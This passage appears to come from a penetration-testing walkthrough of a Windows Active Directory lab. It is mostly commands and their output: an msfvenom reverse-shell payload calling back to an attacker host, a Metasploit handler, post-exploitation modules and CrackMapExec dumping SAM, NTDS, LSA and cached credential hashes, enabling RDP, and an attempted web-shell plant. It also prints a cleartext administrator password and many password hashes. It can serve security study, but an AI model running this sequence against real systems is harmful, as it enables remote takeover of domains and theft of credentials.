[groupname [/COMMENT:"text"]] [/DOMAIN]
             groupname {/ADD [/COMMENT:"text"] | /DELETE}  [/DOMAIN]
             groupname username [...] {/ADD | /DELETE} [/DOMAIN]

E_md4hash wrapper called.
Error: error Creating process(echo ^ > C:\inetpub\wwwroot\backdoor.php) 2
E_md4hash wrapper called.
ERROR: Invalid key name.
Type "REG ADD /?" for usage.
E_md4hash wrapper called.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

MOUNTING SHARES

METERPRETER SHELL
  • [email protected]:/mnt/win2012# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=4444 -f exe –platform windows > backdoor.exe
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
total 933M
-rwxr-xr-x 1 root root 7.0K Jan 31 19:10 backdoor.exe
drwxr-xr-x 2 root root    0 Jul  4  2015 Boot
-r-xr-xr-x 1 root root 390K Nov 14  2013 bootmgr
-rwxr-xr-x 1 root root    1 Jun 18  2013 BOOTNXT
-r-xr-xr-x 1 root root 8.0K Jul  4  2015 BOOTSECT.BAK
drwxr-xr-x 2 root root    0 Aug 22  2013 Documents and Settings
drwxr-xr-x 2 root root    0 Jul  4  2015 inetpub
-rwxr-xr-x 1 root root 932M Jan 31 14:58 pagefile.sys
-rwxr-xr-x 1 root root 7.0K Jan 31 18:51 payload.exe
drwxr-xr-x 2 root root    0 Aug 22  2013 PerfLogs
drwxr-xr-x 2 root root    0 Jul  4  2015 ProgramData
dr-xr-xr-x 2 root root    0 Jul  4  2015 Program Files
drwxr-xr-x 2 root root    0 Aug 22  2013 Program Files (x86)
drwxr-xr-x 2 root root    0 Jul  4  2015 Recovery
drwxr-xr-x 2 root root    0 Nov 14  2013 $Recycle.Bin
drwxr-xr-x 2 root root    0 Jan 31 14:17 System Volume Information
dr-xr-xr-x 2 root root    0 Jul  4  2015 Users
drwxr-xr-x 2 root root    0 Jul  5  2015 Windows
  • msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
  • msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
  • msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.113:4444 
msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) > 
[*] Sending stage (1188911 bytes) to 192.168.1.138
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.138:53378) at 2016-01-31 19:11:58 -0500
  • msf exploit(handler) > sessions -l
Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x64/win64  NT AUTHORITY\SYSTEM @ WIN-8MSB2DD52P9  192.168.1.113:4444 -> 192.168.1.138:53378 (192.168.1.138)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

POST EXPLOITATION
metasploit-windows-post.rc
  • resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_ad_computers resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
Domain Computers
================

 dNSHostName                       distinguishedName                                                description  operatingSystem                    operatingSystemServicePack
 -----------                       -----------------                                                -----------  ---------------                    --------------------------
 WIN-8MSB2DD52P9.xerosecurity.com  CN=WIN-8MSB2DD52P9,OU=Domain Controllers,DC=xerosecurity,DC=com               Windows Server 2012 R2 Datacenter  

[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/smart_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf5/loot/20160131194836_default_192.168.1.138_windows.hashes_919916.txt
[+] 	This host is a Domain Controller!
[*] Dumping password hashes...
[+] 	Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] 	krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2b77d7cda13b836d669bea8ebbdb6464
[+] 	user:1106:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] 	test3:1603:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] 	hacker:1604:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] 	user-XP$:1104:aad3b435b51404eeaad3b435b51404ee:9874f93eb39548c31e655bc688c89064
[+] 	TEST-3F6416AC49$:1602:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47
[*] Post module execution completed

resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/cachedump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Executing module against WIN-8MSB2DD52P9
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: /root/.msf5/loot/20160131194854_default_192.168.1.138_mscache2.creds_222028.txt
[*] John the Ripper format:
# mscash2

[*] Post module execution completed

resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_computers
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9

List of Domain Hosts for the primary Domain.
============================================

 Domain        Hostname         IPs
 ------        --------         ---
 XEROSECURITY  TEST-3F6416AC49  192.168.1.129
 XEROSECURITY  WIN-8MSB2DD52P9  192.168.1.138


[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/credential_collector
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9
[+] Collecting hashes...
    Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: krbtgt:aad3b435b51404eeaad3b435b51404ee:2b77d7cda13b836d669bea8ebbdb6464
    Extracted: user:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
    Extracted: test3:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
    Extracted: hacker:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
    Extracted: WIN-8MSB2DD52P9$:aad3b435b51404eeaad3b435b51404ee:58171b080def3d75833dcc4588956059
    Extracted: user-XP$:aad3b435b51404eeaad3b435b51404ee:9874f93eb39548c31e655bc688c89064
    Extracted: TEST-3F6416AC49$:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47
[+] Collecting tokens...
    IIS APPPOOL\DefaultAppPool
    NT AUTHORITY\IUSR
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-2
    XEROSECURITY\Administrator
    NT AUTHORITY\ANONYMOUS LOGON
[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_domain
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[+] FOUND Domain: xerosecurity
[+] FOUND Domain Controller: WIN-8MSB2DD52P9 (IP: 192.168.1.138)
[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/manage/enable_rdp
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf5/loot/20160131195101_default_192.168.1.138_host.windows.cle_069757.txt
[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Volume Shadow Copy service not running. Starting it now...
[+] Volume Shadow Copy started successfully.
[*] Software Shadow Copy service not running. Starting it now...
[+] Software Shadow Copy started successfully.
[*] NTDS database copied to C:\Windows\Temp\XjxLdwoibp\Active Directory\ntds.dit
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\XjxLdwoibp\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR160.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.578 seconds.

[+]           Administrator (Built-in account for administering the computer/domain)
          Administrator:500:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
          Password Expires: ay, January 1, 1601
          Last Password Change: 7:31:09 PM Saturday, January 30, 2016
          Last Logon: 12:42:59 AM Monday, February 1, 2016
          Logon Count: 54
          
          Hash History:
          Administrator:500:FA3FB68C6EDB18CB7583C80994C8C089:B490B475E987909AE9BD83A65AA94665
Administrator:500:BCD82078CE35C7829DE997CC8916E980:D47A1AAB4276F8B2C8260D6080CB4A6A
Administrator:500:1D1D058C94FD4ACFFA49846759673AEE:B490B475E987909AE9BD83A65AA94665


[+]          Guest (Built-in account for guest access to the computer/domain)
         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
         Password Expires: Never
         Last Password Change: 12:00:00 AM Monday, January 1, 1601
         Last Logon: 12:00:00 AM Monday, January 1, 1601
         Logon Count: 0
          - Account Disabled
- Password Never Expires
- No Password Required

         Hash History:
         

[+] krbtgt (Key Distribution Center Service Account)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2B77D7CDA13B836D669BEA8EBBDB6464
Password Expires: r
Last Password Change: 11:30:36 AM Saturday, July 4, 2015
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
 - Account Disabled

Hash History:
krbtgt:502:A2767649B8542D1D63AA332E6D42A321:2B77D7CDA13B836D669BEA8EBBDB6464


[+]           user ()
          user:1106:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
          Password Expires: r
          Last Password Change: 7:31:37 PM Saturday, January 30, 2016
          Last Logon: 11:09:32 PM Saturday, January 30, 2016
          Logon Count: 5
           - Password Never Expires

          Hash History:
          user:1106:CA57574CC11A255FD2EBD16BFCD3B45F:B490B475E987909AE9BD83A65AA94665
user:1106:C3E26BFE0F884EDBCA0FDE2816978F2B:B490B475E987909AE9BD83A65AA94665


[+] test3 ()
test3:1603:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: ay, January 1, 1601
Last Password Change: 7:16:30 PM Sunday, January 31, 2016
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0

Hash History:
test3:1603:7D03E2B0385244D8FA5FD08D4CBCD034:B490B475E987909AE9BD83A65AA94665


[+] hacker ()
hacker:1604:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: ay, January 1, 1601
Last Password Change: 8:40:50 PM Sunday, January 31, 2016
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0

Hash History:
hacker:1604:D14E9C2FA1F1498C5CD4B1C2F6851AEE:B490B475E987909AE9BD83A65AA94665


[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_patches
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/manage/nbd_server
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: DEVICE.
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/idm
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Looking at Key S-1-5-21-1088676282-494858925-2056655024-500
[*] IDM not installed for this user.
[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_shares
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running against session 3
[*] The following shares were found:
[*] 	Name: SYSVOL
[*] 	Path: C:\Windows\SYSVOL\sysvol
[*] 	Type: 0
[*] 
[*] 	Name: NETLOGON
[*] 	Path: C:\Windows\SYSVOL\sysvol\xerosecurity.com\SCRIPTS
[*] 	Type: 0
[*] 
[*] 	Name: Desktop
[*] 	Path: C:\Users\Administrator\Desktop
[*] 	Type: 0
[*] 
[*] Post module execution completed


resource (/pentest/windows/metasploit-windows-post-exploitation2.rc)> use post/windows/gather/hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation2.rc)> run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3d33c6ea71133396933c08a0326e1da9...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CRACKMAPEXEC
  • [email protected]:/pentest/windows/CrackMapExec# python /pentest/windows/CrackMapExec/crackmapexec.py -u Administrator -p Password123$ -d XEROSECURITY 192.168.1.129 –sam –lsa –ntds vss –shares –check-uac –sessions –disks –users –lusers
 
02-01-2016 15:35:12 [*] 192.168.1.129:445 is running Windows 5.1 (name:TEST-3F6416AC49) (domain:XEROSECURITY)
02-01-2016 15:35:12 [+] 192.168.1.129:445 Login successful XEROSECURITY\Administrator:Password123$
02-01-2016 15:35:12 [+] 192.168.1.129:445 Available shares:
02-01-2016 15:35:12           SHARE     Permissions
02-01-2016 15:35:12           -----     -----------
02-01-2016 15:35:12               C     READ, WRITE
02-01-2016 15:35:12              C$     READ, WRITE
02-01-2016 15:35:12       Downloads     READ, WRITE
02-01-2016 15:35:12            IPC$       NO ACCESS
02-01-2016 15:35:12          ADMIN$     READ, WRITE
02-01-2016 15:35:12 [+] 192.168.1.129:445 Dumping users:
02-01-2016 15:35:12 Administrator (500)/FullName: 
02-01-2016 15:35:12 Administrator (500)/UserComment: 
02-01-2016 15:35:12 Administrator (500)/PrimaryGroupId: 513
02-01-2016 15:35:12 Administrator (500)/BadPasswordCount: 0
02-01-2016 15:35:12 Administrator (500)/LogonCount: 11
02-01-2016 15:35:12 Guest (501)/FullName: 
02-01-2016 15:35:12 Guest (501)/UserComment: 
02-01-2016 15:35:12 Guest (501)/PrimaryGroupId: 513
02-01-2016 15:35:12 Guest (501)/BadPasswordCount: 0
02-01-2016 15:35:12 Guest (501)/LogonCount: 0
02-01-2016 15:35:12 hacker (1005)/FullName: 
02-01-2016 15:35:12 hacker (1005)/UserComment: 
02-01-2016 15:35:12 hacker (1005)/PrimaryGroupId: 513
02-01-2016 15:35:12 hacker (1005)/BadPasswordCount: 0
02-01-2016 15:35:12 hacker (1005)/LogonCount: 0
02-01-2016 15:35:12 HelpAssistant (1000)/FullName: Remote Desktop Help Assistant Account
02-01-2016 15:35:12 HelpAssistant (1000)/UserComment: 
02-01-2016 15:35:12 HelpAssistant (1000)/PrimaryGroupId: 513
02-01-2016 15:35:12 HelpAssistant (1000)/BadPasswordCount: 0
02-01-2016 15:35:12 HelpAssistant (1000)/LogonCount: 0
02-01-2016 15:35:12 SUPPORT_388945a0 (1002)/FullName: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US
02-01-2016 15:35:12 SUPPORT_388945a0 (1002)/UserComment: 
02-01-2016 15:35:12 SUPPORT_388945a0 (1002)/PrimaryGroupId: 513
02-01-2016 15:35:12 SUPPORT_388945a0 (1002)/BadPasswordCount: 0
02-01-2016 15:35:12 SUPPORT_388945a0 (1002)/LogonCount: 0
02-01-2016 15:35:12 test (1003)/FullName: test
02-01-2016 15:35:12 test (1003)/UserComment: 
02-01-2016 15:35:12 test (1003)/PrimaryGroupId: 513
02-01-2016 15:35:12 test (1003)/BadPasswordCount: 0
02-01-2016 15:35:12 test (1003)/LogonCount: 16
02-01-2016 15:35:12 test2 (1004)/FullName: 
02-01-2016 15:35:12 test2 (1004)/UserComment: 
02-01-2016 15:35:12 test2 (1004)/PrimaryGroupId: 513
02-01-2016 15:35:12 test2 (1004)/BadPasswordCount: 0
02-01-2016 15:35:12 test2 (1004)/LogonCount: 1
02-01-2016 15:35:12 [+] 192.168.1.129:445 Dumping SAM hashes (uid:rid:lmhash:nthash):
02-01-2016 15:35:13 Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
02-01-2016 15:35:13 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
02-01-2016 15:35:13 HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
02-01-2016 15:35:13 SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
02-01-2016 15:35:13 test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
02-01-2016 15:35:13 test2:1004:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:35:13 hacker:1005:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:35:13 [+] 192.168.1.129:445 Dumping LSA secrets:
02-01-2016 15:35:13 user:c158f3e72ab78ed2adb9d0fab0e1ec23:XEROSECURITY.COM:XEROSECURITY:::
02-01-2016 15:35:13 Administrator:0620d5420b059bf1ead3532f9ec4ddff:XEROSECURITY.COM:XEROSECURITY:::
02-01-2016 15:35:14 XEROSECURITY\TEST-3F6416AC49$:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47:::
02-01-2016 15:35:14 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount:720071002d003900460065007a00690070007200470061004a0074000000
02-01-2016 15:35:14 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID:010500000000000515000000828ba628f094c85f43170a32e8030000
02-01-2016 15:35:14 DPAPI_SYSTEM:0100000084893622637e63afd446161a0249b443374fdd68233fd27564b784b541f19bbcbcda5a7e05693f8f
02-01-2016 15:35:14 G${ED8F4747-E13D-47bc-856B-5CEFE1A81A7F}:2ee8a48cc675ba4aa2b32b037c32ebb7
02-01-2016 15:35:14 L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75:5253413248000000000200003f00000001000100e9a52e38e90f138b941ebdece37e3c643c6a6f2f68d779d188ce16b354fdff897e3c27cb55f4b55d3cfd5ead25ae6ae86b0849c7032eb030ecccba3b69de73d90000000000000000b50fd99f804549ca0c1a06c0510d7a98f071fb6b02ac0ce137b7ec0a9a3faeec00000000e5d56aa025c0b721b75a59562bb913205eeb89e591b7ea2e07c7997a41d333eb000000001d3526e3eab3f2587cb983a996cf0db81ea63dc8af4542885727aa3d56ad3ec700000000b19f20775ef94b976969fc0757cc2d22d346009ea3dc74705442d046689805b800000000adb28e6b1633eccea3312962712e19ac5253e2bda457de521ad076a73da2122400000000214a49c8afe8d3a790fededa0545267b89d3ce1ecf616e87684b1aba11de847a38df5ec26a40e93f10c908b8e7516df724fbb60f33a0153fb010135b372ed1480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
02-01-2016 15:35:14 L$RTMTIMEBOMB_1320153D-8DA3-4e8e-B27B-0D888223A588:80090e78d173d101
02-01-2016 15:35:15 L${6B3E6424-AF3E-4bff-ACB6-DA535F0DDC0A}:2b23fd158334a16423fa09e1963b69715199ef947aa74374fd650844049df5c02c3f1f9ab280603ef3338dec1095434693d095b28b5f6690
02-01-2016 15:35:15 NL$KM:8a70840d1b3283c55c58471ec992bfdb48318cf8c33fd3c883659b5e93fff6013fc6c3b044e0669582e66eab377dcc8e979b287f7733111805a102cadb0ba553
02-01-2016 15:35:15 [+] 192.168.1.129:445 Dumping NTDS.dit secrets using the VSS method (domain\uid:rid:lmhash:nthash):
02-01-2016 15:35:15 [+] 192.168.1.129:445 Current active sessions:
02-01-2016 15:35:15 [+] 192.168.1.129:445 Available disks:
02-01-2016 15:35:15 A:
02-01-2016 15:35:15 C:
02-01-2016 15:35:15 D:
02-01-2016 15:35:15 [+] 192.168.1.129:445 Logged on users:
02-01-2016 15:35:15 XEROSECURITY\TEST-3F6416AC49$  
02-01-2016 15:35:15 XEROSECURITY\user WIN-8MSB2DD52P9 
02-01-2016 15:35:15 TEST-3F6416AC49\test TEST-3F6416AC49 
02-01-2016 15:35:15 XEROSECURITY\Administrator WIN-8MSB2DD52P9 
02-01-2016 15:35:16 [-] 192.168.1.129:445 DCERPC Error: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
  • [email protected]:/pentest/windows/CrackMapExec# python /pentest/windows/CrackMapExec/crackmapexec.py -u Administrator -p Password123$ -d XEROSECURITY 192.168.1.138 –sam –lsa –ntds vss –shares –check-uac –sessions –disks –users –lusers
 
02-01-2016 15:36:12 [*] 192.168.1.138:445 is running Windows 6.3 Build 9600 (name:WIN-8MSB2DD52P9) (domain:XEROSECURITY)
02-01-2016 15:36:12 [+] 192.168.1.138:445 Login successful XEROSECURITY\Administrator:Password123$
02-01-2016 15:36:12 [+] 192.168.1.138:445 Available shares:
02-01-2016 15:36:12           SHARE     Permissions
02-01-2016 15:36:12           -----     -----------
02-01-2016 15:36:12               C       NO ACCESS
02-01-2016 15:36:12          ADMIN$     READ, WRITE
02-01-2016 15:36:12            IPC$            READ
02-01-2016 15:36:12          SYSVOL            READ
02-01-2016 15:36:12         Desktop     READ, WRITE
02-01-2016 15:36:12        NETLOGON     READ, WRITE
02-01-2016 15:36:12              C$     READ, WRITE
02-01-2016 15:36:12 [+] 192.168.1.138:445 Dumping users:
02-01-2016 15:36:12 Administrator (500)/FullName: 
02-01-2016 15:36:12 Administrator (500)/UserComment: 
02-01-2016 15:36:12 Administrator (500)/PrimaryGroupId: 513
02-01-2016 15:36:12 Administrator (500)/BadPasswordCount: 0
02-01-2016 15:36:12 Administrator (500)/LogonCount: 57
02-01-2016 15:36:12 Guest (501)/FullName: 
02-01-2016 15:36:12 Guest (501)/UserComment: 
02-01-2016 15:36:12 Guest (501)/PrimaryGroupId: 514
02-01-2016 15:36:12 Guest (501)/BadPasswordCount: 0
02-01-2016 15:36:12 Guest (501)/LogonCount: 0
02-01-2016 15:36:12 krbtgt (502)/FullName: 
02-01-2016 15:36:12 krbtgt (502)/UserComment: 
02-01-2016 15:36:12 krbtgt (502)/PrimaryGroupId: 513
02-01-2016 15:36:12 krbtgt (502)/BadPasswordCount: 0
02-01-2016 15:36:12 krbtgt (502)/LogonCount: 0
02-01-2016 15:36:12 user (1106)/FullName: user
02-01-2016 15:36:12 user (1106)/UserComment: 
02-01-2016 15:36:12 user (1106)/PrimaryGroupId: 513
02-01-2016 15:36:12 user (1106)/BadPasswordCount: 0
02-01-2016 15:36:12 user (1106)/LogonCount: 5
02-01-2016 15:36:12 test3 (1603)/FullName: 
02-01-2016 15:36:12 test3 (1603)/UserComment: 
02-01-2016 15:36:12 test3 (1603)/PrimaryGroupId: 513
02-01-2016 15:36:12 test3 (1603)/BadPasswordCount: 0
02-01-2016 15:36:12 test3 (1603)/LogonCount: 0
02-01-2016 15:36:12 hacker (1604)/FullName: 
02-01-2016 15:36:12 hacker (1604)/UserComment: 
02-01-2016 15:36:12 hacker (1604)/PrimaryGroupId: 513
02-01-2016 15:36:12 hacker (1604)/BadPasswordCount: 0
02-01-2016 15:36:12 hacker (1604)/LogonCount: 0
02-01-2016 15:36:12 [+] 192.168.1.138:445 Dumping SAM hashes (uid:rid:lmhash:nthash):
02-01-2016 15:36:12 Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:36:12 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
02-01-2016 15:36:12 [+] 192.168.1.138:445 Dumping LSA secrets:
02-01-2016 15:36:13 XEROSECURITY\WIN-8MSB2DD52P9$:aad3b435b51404eeaad3b435b51404ee:58171b080def3d75833dcc4588956059:::
02-01-2016 15:36:13 XEROSECURITY\Administrator:Password123$
02-01-2016 15:36:14 DPAPI_SYSTEM:010000003ebaec57217e3b64e2c8dbd2ac1a74b89e8556a09a7405a222ffee2e53537aa1c4a8ed162d1c0942
02-01-2016 15:36:14 NL$KM:343d474a146294edb809595557fef61caa0aacf48e573c9f5c8a1244906a3c2125bc17d716f79fad4497e315a4d96d788c035e9e238087756a7c7c2b39854565
02-01-2016 15:36:49 [+] 192.168.1.138:445 Dumping NTDS.dit secrets using the VSS method (domain\uid:rid:lmhash:nthash):
02-01-2016 15:37:21 Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:37:21 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
02-01-2016 15:37:21 WIN-8MSB2DD52P9$:1001:aad3b435b51404eeaad3b435b51404ee:58171b080def3d75833dcc4588956059:::
02-01-2016 15:37:21 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2b77d7cda13b836d669bea8ebbdb6464:::
02-01-2016 15:37:22 user-XP$:1104:aad3b435b51404eeaad3b435b51404ee:9874f93eb39548c31e655bc688c89064:::
02-01-2016 15:37:22 xerosecurity.com\user:1106:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:37:22 TEST-3F6416AC49$:1602:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47:::
02-01-2016 15:37:22 test3:1603:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:37:22 hacker:1604:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
02-01-2016 15:37:22 [+] 192.168.1.138:445 Current active sessions:
02-01-2016 15:37:22 [+] 192.168.1.138:445 Available disks:
02-01-2016 15:37:22 A:
02-01-2016 15:37:22 C:
02-01-2016 15:37:22 D:
02-01-2016 15:37:22 [+] 192.168.1.138:445 Logged on users:
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\Administrator WIN-8MSB2DD52P9 
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 XEROSECURITY\Administrator WIN-8MSB2DD52P9 
02-01-2016 15:37:22 XEROSECURITY\WIN-8MSB2DD52P9$  
02-01-2016 15:37:22 [+] 192.168.1.138:445 UAC status:
02-01-2016 15:37:22 1 - UAC Enabled

GAME OVER!
____
                      __,-~~/~    `---.
                    _/_,---(      ,    )
                __ /        <    /   )  \___
 - ------===;;;'====------------------===;;;===----- -  -
                   \/  ~'~'~'~'~'~\~'~)~'/
                   (_ (   \  (     >    \)
                    \_( _ <         >_>'
                       ~ `-i' ::>|--"
                           I;|.|.|
                          <|i::|i|`.
                        (` ^''`-' ')
 --------------------------------------------------------- 
 + -- --=[WARNING! Nuking ALL targets!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG v1.47

mQGiBFOTBT0RBADPrEncdeI9pqvVLs5y7PSfFcCkY8DAWKbArfCkbgubtQWw5BdI
